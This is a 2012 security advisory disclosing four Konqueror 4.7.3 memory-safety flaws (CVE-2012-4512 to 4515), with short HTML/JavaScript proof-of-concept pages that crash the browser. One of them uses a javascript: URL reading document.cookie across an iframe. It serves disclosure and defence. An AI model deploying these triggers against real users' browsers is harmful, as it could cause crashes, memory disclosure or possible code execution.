|
|
|
|
| |
Credit:
The information has been provided by Tim Brown.
|
| |
Vulnerable Systems:
* Konqueror 4.7.3
1) The Konqueror web browser is vulnerable to type confusion leading to memory disclosure. The root cause of this is the same as CVE-2010-0046 reported by Chris Rohlf which affected WebKit.
2) The Konqueror web browser is vulnerable to an out of bounds memory access when accessing the canvas. In this case the vulnerability was identified whilst playing with bug #43813 from Google's Chrome repository.
3) The Konqueror web browser is vulnerable to a NULL pointer dereference leading to a crash.
4) The Konqueror web browser is vulnerable to a "use-after-free" class flaw when the context menu is used whilst the document DOM is being changed from within Javascript.
These flaws were identified during an analysis of previously reported vulnerabilities that affected Google's Chrome web browser. It is believed that only vulnerability 1 is/was common to the two code bases.
There was a sign-extension in calculating the dimensions of the canvas within scaleLoop , which lead to a miscalculated jump. According to KDE, in the case of 64-bit systems this appeared only to allow a crash to be triggered however on
32-bit systems it could lead to memory disclosure.
The following PoC can trigger the crash on vulnerable versions of Konqueror:
<html>
<body>
<canvas id="tutorial"></canvas>
<script type="text/javascript">
var canvas = document.getElementById("tutorial");
if (canvas.getContext) {
var ctx = canvas.getContext("2d");
canvas.width = 111111;
}
</script>
</body>
</html>
Unfortunely I no longer have the stack trace for this crash however it can be triggered on vulnerable versions of Konqueror using the following PoC:
<html>
<body>
<iframe name="test" src="http://www.google.co.uk"></iframe>
<input type=button value="test"
onclick="window.open('javascript:alert(document.cookie)','test')" >
</body>
</html>
By accessing the context menu for a given iframe whilst the iframe is being updated by the parent can lead to attempts to access no- onger existing objects.This may lead to a crash, or potentially code execution, depending on the state
of the process at the point the no-longer existing object is accessed.
The following PoC can trigger the crash on vulnerable versions of Konqueror:
<html>
<body>
<script>
setInterval(function () {
document.body.innerHTML = "<iframe src=about:konqueror></iframe>";
}, 300);
</script>
</body>
</html>
<B>CVE Information:</B>
<A HREF="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4512">CVE-2012-4512</A>
<A HREF="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4513">CVE-2012-4513</A>
<A HREF="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4514">CVE-2012-4514</A>
<A HREF="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4515">CVE-2012-4515</A>
Disclosure Timeline:
Released On:10th October 2012
|
|
|
|
|
